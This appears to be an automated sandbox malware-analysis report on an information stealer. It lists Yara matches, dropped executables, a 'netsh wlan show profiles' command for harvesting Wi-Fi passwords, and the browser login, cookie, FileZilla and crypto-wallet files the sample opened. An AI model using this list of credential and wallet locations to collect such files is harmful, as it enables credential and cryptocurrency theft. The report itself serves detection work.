Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b07541.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b05570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Traffic.exe.125f1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002F.00000000.2550237363.00000000006A1000.00000002.00000001.01000000.00000021.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2242693260.0000000000A22000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2242861766.0000000000342000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2271671273.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2371502958.00000000125F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: alexxxxxxxx.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: propro.exe PID: 1836, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\jok[1].exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: RegAsm.exe, 00000015.00000002.2519215288.0000000000F78000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\Binance*
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000008.00000002.2542158333.000001A31C51F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: RegAsm.exe, 0000001D.00000002.2642519741.0000000001138000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: 5AWallets/Ledger Live{4AC:\Users\user\AppData\Roaming\Ledger LiveY)A%appdata%\Ledger Live

Tries to harvest and steal WLAN passwords

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to harvest and steal ftp login credentials

Source: C:\Windows\System32\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
